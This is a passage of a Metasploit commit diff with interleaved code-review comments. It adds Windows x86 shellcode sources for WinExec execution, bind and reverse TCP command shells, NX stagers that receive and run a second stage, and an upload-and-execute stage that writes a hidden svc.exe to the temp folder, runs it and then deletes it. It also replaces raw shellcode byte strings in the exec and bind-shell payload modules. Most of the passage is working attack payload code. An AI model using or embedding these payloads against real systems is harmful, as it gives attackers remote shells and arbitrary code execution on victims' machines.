+;-----------------------------------------------------------------------------;
+; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (28 July 2009)
+; Size: 191 bytes + strlen(command) + 1
+; Build: >build.py single_exec
+;-----------------------------------------------------------------------------;
+
+[BITS 32]
+[ORG 0]
+
+ cld ; Clear the direction flag.
+ call start ; Call start, this pushes the address of 'api_call' onto the stack.
+delta: ;
+%include "./src/block/block_api.asm" ;
+start: ;
+ pop ebp ; Pop off the address of 'api_call' for calling later.
+ push byte +1 ;
+ lea eax, [ebp+command-delta]
+ push eax ;
+ push 0x876F8B31 ; hash( "kernel32.dll", "WinExec" )
+ call ebp ; WinExec( &command, 1 );
+ ; Finish up with the EXITFUNK.
+%include "./src/block/block_exitfunk.asm"
+command:
+ ;db "calc.exe", 0
\ No newline at end of file
diff --git a/external/source/shellcode/windows/x86/src/single/single_shell_bind_tcp.asm b/external/source/shellcode/windows/x86/src/single/single_shell_bind_tcp.asm
new file mode 100644
index 0000000000..fdc5dfe93f
--- /dev/null
+++ b/external/source/shellcode/windows/x86/src/single/single_shell_bind_tcp.asm
@@ -0,0 +1,20 @@
+;-----------------------------------------------------------------------------;
+; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (28 July 2009)
+; Size: 341 bytes
+; Build: >build.py single_shell_bind_tcp
+;-----------------------------------------------------------------------------;
+[BITS 32]
+[ORG 0]
+
+ cld ; Clear the direction flag.
+ call start ; Call start, this pushes the address of 'api_call' onto the stack.
+%include "./src/block/block_api.asm"
+start: ;
+ pop ebp ; Pop off the address of 'api_call' for calling later.
+%include "./src/block/block_bind_tcp.asm"
+ ; By here we will have performed the bind_tcp connection and EDI will be out socket.
+%include "./src/block/block_shell.asm"
+ ; Finish up with the EXITFUNK.
+%include "./src/block/block_exitfunk.asm"
\ No newline at end of file
diff --git a/external/source/shellcode/windows/x86/src/single/single_shell_reverse_tcp.asm b/external/source/shellcode/windows/x86/src/single/single_shell_reverse_tcp.asm
new file mode 100644
index 0000000000..276cc8aa04
--- /dev/null
+++ b/external/source/shellcode/windows/x86/src/single/single_shell_reverse_tcp.asm
@@ -0,0 +1,20 @@
+;-----------------------------------------------------------------------------;
+; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (28 July 2009)
+; Size: 314 bytes
+; Build: >build.py single_shell_reverse_tcp
+;-----------------------------------------------------------------------------;
+[BITS 32]
+[ORG 0]
+
+ cld ; Clear the direction flag.
+ call start ; Call start, this pushes the address of 'api_call' onto the stack.
+%include "./src/block/block_api.asm"
+start: ;
+ pop ebp ; Pop off the address of 'api_call' for calling later.
+%include "./src/block/block_reverse_tcp.asm"
+ ; By here we will have performed the reverse_tcp connection and EDI will be out socket.
+%include "./src/block/block_shell.asm"
+ ; Finish up with the EXITFUNK.
+%include "./src/block/block_exitfunk.asm"
\ No newline at end of file
diff --git a/external/source/shellcode/windows/x86/src/stage/stage_shell.asm b/external/source/shellcode/windows/x86/src/stage/stage_shell.asm
new file mode 100644
index 0000000000..8e2865d27b
--- /dev/null
+++ b/external/source/shellcode/windows/x86/src/stage/stage_shell.asm
@@ -0,0 +1,22 @@
+;-----------------------------------------------------------------------------;
+; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (28 July 2009)
+; Size: 240 bytes
+; Build: >build.py stage_shell
+;-----------------------------------------------------------------------------;
+[BITS 32]
+[ORG 0]
+
+; By here EDI will be our socket and EBP will be the address of 'api_call' from stage 1.
+; We reset EBP to the address of 'api_call' as found in this blob to avoid any problems
+; if the old stage 1 location gets munged.
+
+ cld ; Clear the direction flag.
+ call start ; Call start, this pushes the address of 'api_call' onto the stack.
+%include "./src/block/block_api.asm"
+start: ;
+ pop ebp ; Pop off the address of 'api_call' for calling later.
+%include "./src/block/block_shell.asm"
+ ; Perform the call to our EXITFUNC.
+%include "./src/block/block_exitfunk.asm"
\ No newline at end of file
diff --git a/external/source/shellcode/windows/x86/src/stage/stage_upexec.asm b/external/source/shellcode/windows/x86/src/stage/stage_upexec.asm
new file mode 100644
index 0000000000..a9fb49a1ff
--- /dev/null
+++ b/external/source/shellcode/windows/x86/src/stage/stage_upexec.asm
@@ -0,0 +1,137 @@
+;-----------------------------------------------------------------------------;
+; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (28 July 2009)
+; Size: 398 bytes
+; Build: >build.py stage_upexec
+;-----------------------------------------------------------------------------;
+[BITS 32]
+[ORG 0]
+
+; By here EDI will be our socket and EBP will be the address of 'api_call' from stage 1.
+; We reset EBP to the address of 'api_call' as found in this blob to avoid any problems
+; if the old stage 1 location gets munged.
+
+ cld ; Clear the direction flag.
+ call start ; Call start, this pushes the address of 'api_call' onto the stack.
+delta: ;
+%include "./src/block/block_api.asm"
+start: ;
+ pop ebp ; Pop off the address of 'api_call' for calling later.
+ ; create a file in a temp dir...
+ push byte 127 ; Push down 127
+ pop eax ; And pop it into EAX
+ shl eax, 3 ; Shift EAX left by 3 so it = 1016
+ sub esp, eax ; Alloc this space on the stack for the temp file path + name
+ push esp ; Push the buffer address
+ push eax ; Push the buffer size (127 * 4 = 508)
+ push 0xE449F330 ; hash( "kernel32.dll", "GetTempPathA" )
+ call ebp ; GetTempPathA( 1016, &buffer );
+ lea eax, [esp+eax] ; EAX = pointer to the end of the temp path buffer (ESP point to the full path)
+ mov dword [eax+0], 0x2E637673 ; Append the file name...
+ mov dword [eax+4], 0x00657865 ; 'svc.exe',0
+ ; Create the file...
+ mov eax, esp ; to save a few bytes, pace the file path pointer in EAX
+ push eax ; save the pointer to the file path for later
+ push byte 0 ; We dont specify a template file handle
+ push byte 6 ; The Flags and Attributes: FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM
+ push byte 2 ; The Creation Disposition: CREATE_ALWAYS
+ push byte 0 ; We dont specify a SECURITY_ATTRIBUTES structure
+ push byte 7 ; The Share Mode: FILE_SHARE_DELETE|FILE_SHARE_READ|FILE_SHARE_WRITE
+ push 0xE0000000 ; The Desired Access: GENERIC_EXECUTE|GENERIC_READ|GENERIC_WRITE
+ push eax ; The name of the file to create
+ push 0x4FDAF6DA ; hash( "kernel32.dll", "CreateFileA" )
+ call ebp ; CreateFileA( ... );
+ mov ebx, eax ; EBX = the new file handle
+ ; Receive the size of the incoming file...
+ push esp ; Alloc a dword for the recv buffer param
+ mov esi, esp ; Save pointer
+ push byte 0 ; Flags
+ push byte 4 ; Length = sizeof( DWORD );
+ push esi ; The 4 byte buffer on the stack to hold the second stage length
+ push edi ; The saved socket
+ push 0x5FC8D902 ; hash( "ws2_32.dll", "recv" )
+ call ebp ; recv( s, &dwLength, 4, 0 );
+ ; Alloc a RW buffer for the incoming file...
+ mov esi, [esi] ; Dereference the pointer to the second stage length
+ push byte 0x04 ; PAGE_READWRITE
+ push 0x1000 ; MEM_COMMIT
+ push esi ; Push the newly recieved second stage length.
+ push byte 0 ; NULL as we dont care where the allocation is.
+ push 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" )
+ call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_READWRITE );
+ push ebx ; Save the file handle for later call to CloseHandle
+ ; setup the parameters for subsequent call to WriteFile (saves us trying to preserve various registers)
+ push ebx ; Alloc a dword for the bytes written param
+ mov ecx, esp ; Save this address
+ push byte 0 ; null as we dont set an overlapped param
+ push ecx ; Pointer to the number of bytes written output param
+ push esi ; Push the buffer length
+ push eax ; Push the newly allocated RW buffer
+ push ebx ; Push the hFile param
+ mov ebx, eax ; EBX = our new memory address for the incoming file
+ ; read in the incoming file...
+read_more: ;
+ push byte 0 ; Flags
+ push esi ; Length
+ push ebx ; The current address into our incoming files RW buffer
+ push edi ; The saved socket
+ push 0x5FC8D902 ; hash( "ws2_32.dll", "recv" )
+ call ebp ; recv( s, buffer, length, 0 );
+ add ebx, eax ; buffer += bytes_received
+ sub esi, eax ; length -= bytes_received
+ test esi, esi ; Test length
+ jnz read_more ; Continue if we have more to read
+ ; write the entire files buffer to disk...
+ push 0x5BAE572D ; hash( "kernel32.dll", "WriteFile" )
+ call ebp ; WriteFile( hFile, pBuffer, len, &out, 0 );
+ pop ecx ; Restore esp to the correct location for the next call
+ ; close the file handle, we dont need to push the handle as it is allready pushed onto stack
+ push 0x528796C6 ; hash( "kernel32.dll", "CloseHandle" )
+ call ebp ; CloseHandle( hFile );
+ ; execute the file...
+ push edi ; Our socket becomes the processes hStdError
+ push edi ; Our socket becomes the processes hStdOutput
+ push edi ; Our socket becomes the processes hStdInput
+ xor esi, esi ; Clear ESI for all the NULL's we need to push
+ push byte 18 ; We want to place (18 * 4) = 72 null bytes onto the stack
+ pop ecx ; Set ECX for the loop
+push_loop2: ;
+ push esi ; Push a null dword
+ loop push_loop2 ; Keep looping untill we have pushed enough nulls
+ mov word [esp+60], 0x0101 ; Set the STARTUPINFO Structure's dwFlags to STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW
+ lea eax, [esp+16] ; Set EAX as a pointer to our STARTUPINFO Structure
+ mov byte [eax], 68 ; Set the size of the STARTUPINFO Structure
+ ; perform the call to CreateProcessA
+ push esp ; Push the pointer to the PROCESS_INFORMATION Structure
+ push eax ; Push the pointer to the STARTUPINFO Structure
+ push esi ; The lpCurrentDirectory is NULL so the new process will have the same current directory as its parent
+ push esi ; The lpEnvironment is NULL so the new process will have the same enviroment as its parent
+ push esi ; We dont specify any dwCreationFlags
+ inc esi ; Increment ESI to be one
+ push esi ; Set bInheritHandles to TRUE in order to inheritable all possible handle from the parent
+ dec esi ; Decrement ESI back down to zero
+ push esi ; Set lpThreadAttributes to NULL
+ push esi ; Set lpProcessAttributes to NULL
+ push dword [esp+120] ; Set the lpCommandLine to run the file (Use the saved pointer to the file path)
+ push esi ; Set lpApplicationName to NULL as we are using the command line param instead
+ push 0x863FCC79 ; hash( "kernel32.dll", "CreateProcessA" )
+ call ebp ; CreateProcessA( 0, &file, 0, 0, TRUE, 0, 0, 0, &si, &pi );
+ ; perform the call to WaitForSingleObject
+ mov eax, esp ; Save pointer to the PROCESS_INFORMATION Structure
+ dec esi ; Decrement ESI down to -1 (INFINITE)
+ push esi ; Push INFINITE inorder to wait forever
+ inc esi ; Increment ESI back to zero
+ push dword [eax] ; Push the handle from our PROCESS_INFORMATION.hProcess
+ push 0x601D8708 ; hash( "kernel32.dll", "WaitForSingleObject" )
+ call ebp ; WaitForSingleObject( pi.hProcess, INFINITE );
+ ; close the socket...
+ push edi ; Push the socket to close
+ push 0x614D6E75 ; hash( "ws2_32.dll", "closesocket" )
+ call ebp ; closesocket( s );
+ ; delete the file...
+ push dword [esp+88] ; Push the saved pointer to the file path
+ push 0x13DD2ED7 ; hash( "kernel32.dll", "DeleteFileA" )
+ call ebp ; DeleteFileA( &file );
+ ; finish up with the EXITFUNK
+%include "./src/block/block_exitfunk.asm"
diff --git a/external/source/shellcode/windows/x86/src/stager/stager_bind_tcp_nx.asm b/external/source/shellcode/windows/x86/src/stager/stager_bind_tcp_nx.asm
new file mode 100644
index 0000000000..986cc25eb7
--- /dev/null
+++ b/external/source/shellcode/windows/x86/src/stager/stager_bind_tcp_nx.asm
@@ -0,0 +1,19 @@
+;-----------------------------------------------------------------------------;
+; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (24 July 2009)
+; Size: 301 bytes
+; Build: >build.py stager_bind_tcp_nx
+;-----------------------------------------------------------------------------;
+[BITS 32]
+[ORG 0]
+
+ cld ; Clear the direction flag.
+ call start ; Call start, this pushes the address of 'api_call' onto the stack.
+%include "./src/block/block_api.asm"
+start: ;
+ pop ebp ; pop off the address of 'api_call' for calling later.
+%include "./src/block/block_bind_tcp.asm"
+ ; By here we will have performed the bind_tcp connection and EDI will be our socket.
+%include "./src/block/block_recv.asm"
+ ; By now we will have recieved in the second stage into a RWX buffer and be executing it
\ No newline at end of file
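Review bot: The comment on the `push eax` that passes the buffer size to GetTempPathA says `(127 * 4 = 508)`, but the `shl eax, 3` three lines earlier makes EAX 1016, which is what both the `shl` comment and the `GetTempPathA( 1016, &buffer )` comment say, so a reader checking the stack arithmetic is sent the wrong way. Suggested text: `; Push the buffer size (127 << 3 = 1016)`. The `pop ecx ; Restore esp` after WriteFile and the `[esp+120]` / `[esp+88]` operands only work for the exact number of dwords pushed before them, and none of those comments states the depth assumed, so a short note on each (how many pushes it accounts for) would protect the next edit to this sequence. Comment typos worth fixing in the same pass: `pace` (place), `recieved`, `allready`, `untill`, `enviroment`, `inorder`.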
diff --git a/external/source/shellcode/windows/x86/src/stager/stager_reverse_tcp_nx.asm b/external/source/shellcode/windows/x86/src/stager/stager_reverse_tcp_nx.asm
new file mode 100644
index 0000000000..e7960d9110
--- /dev/null
+++ b/external/source/shellcode/windows/x86/src/stager/stager_reverse_tcp_nx.asm
@@ -0,0 +1,20 @@
+;-----------------------------------------------------------------------------;
+; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (24 July 2009)
+; Size: 274 bytes
+; Build: >build.py stager_reverse_tcp_nx
+;-----------------------------------------------------------------------------;
+
+[BITS 32]
+[ORG 0]
+
+ cld ; Clear the direction flag.
+ call start ; Call start, this pushes the address of 'api_call' onto the stack.
+%include "./src/block/block_api.asm"
+start: ;
+ pop ebp ; pop off the address of 'api_call' for calling later.
+%include "./src/block/block_reverse_tcp.asm"
+ ; By here we will have performed the reverse_tcp connection and EDI will be our socket.
+%include "./src/block/block_recv.asm"
+ ; By now we will have recieved in the second stage into a RWX buffer and be executing it
\ No newline at end of file
diff --git a/lib/msf/core/payload/windows.rb b/lib/msf/core/payload/windows.rb
index 3255feb594..99ac717919 100644
--- a/lib/msf/core/payload/windows.rb
+++ b/lib/msf/core/payload/windows.rb
@@ -15,9 +15,9 @@ module Msf::Payload::Windows # @@exit_types = {
- 'seh' => 0x5f048af0, # SetUnhandledExceptionFilter
- 'thread' => 0x60e0ceef, # ExitThread
- 'process' => 0x73e2d87e, # ExitProcess
+ 'seh' => 0xEA320EFE, # SetUnhandledExceptionFilter
+ 'thread' => 0x0A2A1DE0, # ExitThread
+ 'process' => 0x56A2B5F0, # ExitProcess
 } #
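Review bot: The three `@@exit_types` values are swapped for new ones without any comment saying which hash routine they are computed for, while shell_bind_tcp_xpfw.rb and passivex.rb in the same commit hard-code the previous three values in a `replace_var` override; nothing at this table tells a maintainer that the two families must not be mixed when an exit type is added or recomputed. Suggested comment above the table: `# API hashes in the form consumed by the api_call routine included from external/source/shellcode/windows/x86/src/block/block_api.asm; payloads still built from the older shellcode (shell_bind_tcp_xpfw, passivex) override replace_var to keep the previous values.` The hunk's leading context lines are run together with its header here, so I could not check the wording of the existing comment above the table.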
@@ -64,6 +64,13 @@ module Msf::Payload::Windows
 # ensure that the entire stage is read in.
 #
 def handle_intermediate_stage(conn, payload)
+
+ if( self.module_info['Stager']['RequiresMidstager'] == false )
+ conn.put( [ payload.length ].pack('V') )
+ # returning false allows stager.rb!handle_connection() to prepend the stage_prefix if needed
+ return false
+ end
+
 return false if (payload.length < 512)
 # The mid-stage works by reading in a four byte length in host-byte
diff --git a/lib/msf/core/payload/windows/exec.rb b/lib/msf/core/payload/windows/exec.rb
index 2911214dff..287243bcbb 100644
--- a/lib/msf/core/payload/windows/exec.rb
+++ b/lib/msf/core/payload/windows/exec.rb
@@ -1,3 +1,7 @@
+##
+# $Id$
+##
+
 module Msf
 ###
@@ -5,6 +9,7 @@ module Msf
 # Common command execution implementation for Windows.
 #
 ###
+
 module Payload::Windows::Exec
 include Msf::Payload::Windows
@@ -15,7 +20,7 @@ module Payload::Windows::Exec
 'Name' => 'Windows Execute Command',
 'Version' => '$Revision$',
 'Description' => 'Execute an arbitrary command',
- 'Author' => 'vlad902',
+ 'Author' => [ 'vlad902', 'Stephen Fewer ' ],
 'License' => MSF_LICENSE,
 'Platform' => 'win',
 'Arch' => ARCH_X86,
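Review bot: `self.module_info['Stager']['RequiresMidstager'] == false` deliberately separates an explicit `false` from an absent key (`nil`), so every stager that does not declare the key keeps the legacy mid-stage path; that is the right backward-compatible choice, but it is exactly the kind of test a later cleanup turns into `unless ...['RequiresMidstager']` and silently changes, so it deserves a comment such as `# Only stagers that explicitly set 'RequiresMidstager' => false skip the mid-stage; an absent key keeps the legacy path.` The new early return also runs before the `payload.length < 512` check, so for those stagers the four-byte length is always sent regardless of stage size, which looks intended (the bind_tcp and reverse_tcp stagers in this commit set the key) but should be stated in the same comment. The rest of handle_intermediate_stage lies outside the hunk.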
@@ -23,16 +28,20 @@ module Payload::Windows::Exec { 'Offsets' => { - 'EXITFUNC' => [ 100, 'V' ] + 'EXITFUNC' => [ 161, 'V' ] }, - 'Payload' => - "\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b" + - "\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99" + - "\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x04" + - "\x75\xe5\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb" + - "\x8b\x1c\x8b\x01\xeb\x89\x5c\x24\x04\xc3\x5f\x31\xf6\x60\x56\x64" + - "\x8b\x46\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\x89\xf8\x83" + - "\xc0\x6a\x50\x68\x7e\xd8\xe2\x73\x68\x98\xfe\x8a\x0e\x57\xff\xe7" + 'Payload' => "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" + + "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" + + "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" + + "\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" + + "\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" + + "\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" + + "\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" + + "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" + + "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" + + "\x6A\x01\x8D\x85\xB9\x00\x00\x00\x50\x68\x31\x8B\x6F\x87\xFF\xD5" + + "\xBB\xE0\x1D\x2A\x0A\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06\x7C\x0A" + + "\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF\xD5" } )) diff --git a/lib/msf/core/payload/windows/reflectivedllinject.rb b/lib/msf/core/payload/windows/reflectivedllinject.rb index bad8a5c43f..623bf032f1 100644 --- a/lib/msf/core/payload/windows/reflectivedllinject.rb +++ b/lib/msf/core/payload/windows/reflectivedllinject.rb 
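Review bot: The new `'Payload'` byte string is committed with no reference to the assembly it was generated from, even though the `.asm` headers added in this commit name the exact build command (`build.py single_exec`); the same holds for the replaced blobs in shell_bind_tcp.rb, shell_reverse_tcp.rb, bind_tcp.rb, reverse_tcp.rb and shell.rb. A one-line comment above each `'Payload'`, e.g. `# Generated from src/single/single_exec.asm via build.py single_exec; rebuild rather than hand-edit`, lets a reviewer regenerate and diff the bytes instead of trusting an opaque blob. The new `EXITFUNC` offset of 161 does land on the immediate of the `\xBB` (mov ebx, imm32) at byte 160, whose bytes `\xE0\x1D\x2A\x0A` are the new 'thread' value, so the offset itself checks out.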
@@ -82,7 +82,7 @@ module Payload::Windows::ReflectiveDllInject
 "\x68\x04\x00\x00\x00" + # push 0x4 ; signal we have attached
 "\x50" + # push eax ; some value for hinstance
 "\xFF\xD0" + # call eax ; call DllMain( somevalue, DLL_METASPLOIT_ATTACH, socket )
- "\x68\xDE\xC0\xAD\xDE" + # push 0xDEADC0DE ; our EXITFUNC placeholder
+ "\x68\xE0\x1D\x2A\x0A" + # push 0x0A2A1DE0 ; our EXITFUNC placeholder (Default to ExitThread for migration)
 "\x68\x05\x00\x00\x00" + # push 0x5 ; signal we have detached
 "\x50" + # push eax ; some value for hinstance
 "\xFF\xD3" # call ebx ; call DllMain( somevalue, DLL_METASPLOIT_DETACH, exitfunk )
diff --git a/modules/payloads/singles/windows/shell_bind_tcp.rb b/modules/payloads/singles/windows/shell_bind_tcp.rb
index d7f8755e1d..3c03fbca49 100644
--- a/modules/payloads/singles/windows/shell_bind_tcp.rb
+++ b/modules/payloads/singles/windows/shell_bind_tcp.rb
@@ -24,7 +24,7 @@ module Metasploit3
 'Name' => 'Windows Command Shell, Bind TCP Inline',
 'Version' => '$Revision$',
 'Description' => 'Listen for a connection and spawn a command shell',
- 'Author' => 'vlad902',
+ 'Author' => [ 'vlad902', 'Stephen Fewer ' ],
 'License' => MSF_LICENSE,
 'Platform' => 'win',
 'Arch' => ARCH_X86,
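Review bot: The replacement comment still calls `0x0A2A1DE0` a `placeholder` while the parenthetical says it is now the ExitThread default; the two readings conflict, and from this hunk alone a reader cannot tell whether an EXITFUNC offset still patches these four bytes or whether ExitThread is now fixed for this stage. Suggested text, adjusted to whichever is true: `# push 0x0A2A1DE0 ; EXITFUNC hash, ExitThread by default (state here whether the offset table still overwrites it)`. The method containing this byte string starts and ends outside the hunk.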
@@ -34,38 +34,31 @@ module Metasploit3 { 'Offsets' => { - 'LPORT' => [ 162, 'n' ], - 'EXITFUNC' => [ 308, 'V' ], + 'LPORT' => [ 201, 'n' ], + 'EXITFUNC' => [ 311, 'V' ], }, - 'Payload' => - "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c" + - "\x24\x24\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b" + - "\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01" + - "\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d" + - "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f" + - "\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb" + - "\x03\x2c\x8b\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64" + - "\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40" + - "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53" + - "\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\xff\xd0" + - "\x68\xcb\xed\xfc\x3b\x50\xff\xd6\x5f\x89\xe5\x66" + - "\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09" + - "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53" + - "\x43\x53\xff\xd0\x66\x68\x11\x5c\x66\x53\x89\xe1" + - "\x95\x68\xa4\x1a\x70\xc7\x57\xff\xd6\x6a\x10\x51" + - "\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53" + - "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50" + - "\x54\x54\x55\xff\xd0\x93\x68\xe7\x79\xc6\x79\x57" + - "\xff\xd6\x55\xff\xd0\x66\x6a\x64\x66\x68\x63\x6d" + - "\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89" + - "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93" + - "\x8d\x7a\x38\xab\xab\xab\x68\x72\xfe\xb3\x16\xff" + - "\x75\x44\xff\xd6\x5b\x57\x52\x51\x51\x51\x6a\x01" + - "\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53" + - "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83" + - "\xc4\x64\xff\xd6\x52\xff\xd0\x68\x7e\xd8\xe2\x73" + - "\x53\xff\xd6\xff\xd0" - + 'Payload' => "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" + + "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" + + "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" + + "\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" + + 
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" + + "\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" + + "\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" + + "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" + + "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" + + "\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07" + + "\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00" + + "\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF" + + "\xD5\x89\xC7\x31\xDB\x53\x68\x02\x00\x11\x5C\x89\xE6\x6A\x10\x56" + + "\x57\x68\xC2\xDB\x37\x67\xFF\xD5\x53\x57\x68\xB7\xE9\x38\xFF\xFF" + + "\xD5\x53\x53\x57\x68\x74\xEC\x3B\xE1\xFF\xD5\x57\x89\xC7\x68\x75" + + "\x6E\x4D\x61\xFF\xD5\x68\x63\x6D\x64\x00\x89\xE3\x57\x57\x57\x31" + + "\xF6\x6A\x12\x59\x56\xE2\xFD\x66\xC7\x44\x24\x3C\x01\x01\x8D\x44" + + "\x24\x10\xC6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4E\x56\x56\x53" + + "\x56\x68\x79\xCC\x3F\x86\xFF\xD5\x89\xE0\x4E\x56\x46\xFF\x30\x68" + + "\x08\x87\x1D\x60\xFF\xD5\xBB\xE0\x1D\x2A\x0A\x68\xA6\x95\xBD\x9D" + + "\xFF\xD5\x3C\x06\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F" + + "\x6A\x00\x53\xFF\xD5" } )) end diff --git a/modules/payloads/singles/windows/shell_bind_tcp_xpfw.rb b/modules/payloads/singles/windows/shell_bind_tcp_xpfw.rb index a2a2ba3bdc..49aab20fc3 100644 --- a/modules/payloads/singles/windows/shell_bind_tcp_xpfw.rb +++ b/modules/payloads/singles/windows/shell_bind_tcp_xpfw.rb 
@@ -77,5 +77,18 @@ module Metasploit3
 }
 ))
 end
-
+
+ # for now we must let this payload use the old EXITFUNC hash values.
+ def replace_var(raw, name, offset, pack)
+ super
+ if( name == 'EXITFUNC' )
+ datastore[name] = 'thread' if not datastore[name]
+ raw[offset, 4] = [ 0x5F048AF0 ].pack(pack || 'V') if datastore[name] == 'seh'
+ raw[offset, 4] = [ 0x60E0CEEF ].pack(pack || 'V') if datastore[name] == 'thread'
+ raw[offset, 4] = [ 0x73E2D87E ].pack(pack || 'V') if datastore[name] == 'process'
+ return true
+ end
+ return false
+ end
+
 end
\ No newline at end of file
diff --git a/modules/payloads/singles/windows/shell_reverse_tcp.rb b/modules/payloads/singles/windows/shell_reverse_tcp.rb
index 2f09d29f77..dc14a405eb 100644
--- a/modules/payloads/singles/windows/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/shell_reverse_tcp.rb
@@ -24,7 +24,7 @@ module Metasploit3
 'Name' => 'Windows Command Shell, Reverse TCP Inline',
 'Version' => '$Revision$',
 'Description' => 'Connect back to attacker and spawn a command shell',
- 'Author' => 'vlad902',
+ 'Author' => [ 'vlad902', 'Stephen Fewer ' ],
 'License' => MSF_LICENSE,
 'Platform' => 'win',
 'Arch' => ARCH_X86,
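Review bot: The `replace_var` override throws away the value returned by `super` and answers `false` for every name other than `EXITFUNC`; if the caller uses that return value to learn whether a variable was substituted, LPORT and the other offsets of this payload would now be reported as unhandled, so it is safer to keep the parent's answer: `result = super` and then `return result unless name == 'EXITFUNC'`. The same fourteen lines are repeated verbatim in passivex.rb; the three legacy hashes could live in one shared constant, e.g. `LEGACY_EXIT_TYPES = { 'seh' => 0x5F048AF0, 'thread' => 0x60E0CEEF, 'process' => 0x73E2D87E }`, with a single lookup in place of three conditional assignments. `datastore[name] = 'thread' if not datastore[name]` also writes a default back into the datastore as a side effect of a substitution call, which deserves a comment if it is intentional.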
